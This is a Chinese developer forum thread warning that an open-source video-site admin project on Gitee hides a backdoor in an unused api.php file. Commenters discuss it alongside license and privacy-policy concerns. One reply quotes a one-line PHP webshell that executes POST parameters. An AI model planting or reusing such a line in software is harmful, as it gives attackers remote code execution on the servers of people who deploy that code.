现如今的开源代码请谨慎使用

2021-11-12 18:04:16 +08:00
 dzdh

有人问一个开源视频网站代码能不能给帮忙改改

看了一眼 知乎好家伙

https://gitee.com/positive-rain-cloud/zy-film-admin/blob/master/public/api.php

11346 次点击
所在节点    程序员
53 条回复
holystrike
2021-11-12 18:06:58 +08:00
够狠
不过生产环境是要禁用 eval()的
AoEiuV020
2021-11-12 18:11:36 +08:00
这就可以直说是后门了,假装成漏洞的后门,
AoEiuV020
2021-11-12 18:12:46 +08:00
好家伙,看错了,这是装都不装,特地上传的后门,
gabon
2021-11-12 18:12:53 +08:00
好家伙,看不懂 php ,哪位能解释下😂
Trim21
2021-11-12 18:16:41 +08:00
这种又放了个原版 Apache-2.0 的 license ,又在 readme 说不让商用的,到底是按 apache 还是说按 readme...
InDom
2021-11-12 18:18:28 +08:00
一句话木马。

<?php $_POST['a']()$_POST['b'];
AoEiuV020
2021-11-12 18:24:39 +08:00
不过好歹比闭源好些,公开挂在网上有坑可能像这样被别人发现,闭源的话自己没发现问题就只能被坑了,

而且这 eval 也太粗暴了吧,我代码下载来解压直接报毒,
smallyu
2021-11-12 18:25:52 +08:00
我觉得不是故意的
djkloop
2021-11-12 18:28:40 +08:00
多了,隐私协议也要注意,


https://page.xiaojukeji.com/m/ddPage_0CZOoRgq.html
kaitok
2021-11-12 18:35:24 +08:00
@gabon 我猜是 post 请求 /public/api 的 a 参数的代码直接执行
djkloop
2021-11-12 18:35:40 +08:00
1 、对于免费版用户的用户资料,我方享有独家的、全球通用的、永久的、免费的资料许可使用权利(并有权在多个层面对该权利进行再授权),我方有权存储、整理、分析、使用、复制、修订、改写、发布、翻译、分发、执行和展示“您的资料”或制作其派生作品,或以任何形式将“您的资料”纳入其他作品内。

其中这条就离谱
AoEiuV020
2021-11-12 18:36:08 +08:00
@smallyu 我第一眼也以为不是故意的,然而他整个项目都没有功能有调用这个 api.php ,只能认为是故意埋的,
AoEiuV020
2021-11-12 18:37:13 +08:00
@djkloop 这就懂了,没有后门的话这一条根本没法实现,
skiy
2021-11-12 18:50:07 +08:00
国外很多 npm 包经常被爆漏洞或者被黑,但人家是不经意的。但国内这些,不知道是“技术能力”的原因,还是故意为之。或者说对开源协议有什么自己独特的理解。

比如前段时间闹得沸沸扬扬的 DEDECMS 事件,有很多人推的这个“PbootCMS”
https://gitee.com/hnaoyun/PbootCMS/blob/3.X/core/basic/Kernel.php

其实也是用 `eval`。

我只是好奇这些标榜 `Apache 2` 协议的,然后指定说某个文件不可以修改和破解的。以我的理解:

“将这个文件解码出来后,然后再将建一个文件保存。不引用它的那个“授权”核心源码,而是引用这个文件。这个样子算所谓“破解”核心源码吗?。或者说,完全把那个文件删掉,再用新的文件来引入。这算是遵循 Apache2 的规范吗?”
efaun
2021-11-12 19:25:50 +08:00
gitee 上开源的东西我看都不看
Osk
2021-11-12 19:31:43 +08:00
一直如此, 大家都觉得开源的, 别人会帮我审核代码, 这不, 楼主这就帮我们审核了一次. /狗头保命 /
Acoffice
2021-11-12 19:36:07 +08:00
差点以为已经开始投毒了呢
josexy
2021-11-12 19:51:57 +08:00
我看得懂,而且我大受震撼😄
djkloop
2021-11-12 20:09:19 +08:00
@AoEiuV020 反正代码层面要注意,各方面都要注意,很多都是打着免费开源,在各地方给你留坑。像刚才滴滴那个开源的工具,就离谱。
skiy
2021-11-12 20:29:45 +08:00
@djkloop 其实那个条款是违法的。http://www.npc.gov.cn/npc/c30834/202108/a8c4e3672c74491a80b53a172bb753fe.shtml
第一章第十条:
“第十条 任何组织、个人不得非法收集、使用、加工、传输他人个人信息,不得非法买卖、提供或者公开他人个人信息;不得从事危害国家安全、公共利益的个人信息处理活动。”第十四、十五条……还有很多条款都很明确了。就怕他们对于“您的信息”的定义为“爱好”等无关信息了。

新版个人信息保护法很强,就看执行力度的问题了。要是遇到较真的用户,那绝对会一告一个准。可惜,在中国很多人都不喜欢跟法院和律师打交道。(在不涉及政治和制度等“官”层面,这方面法院应该会“公正”一些吧?)

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/815016

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX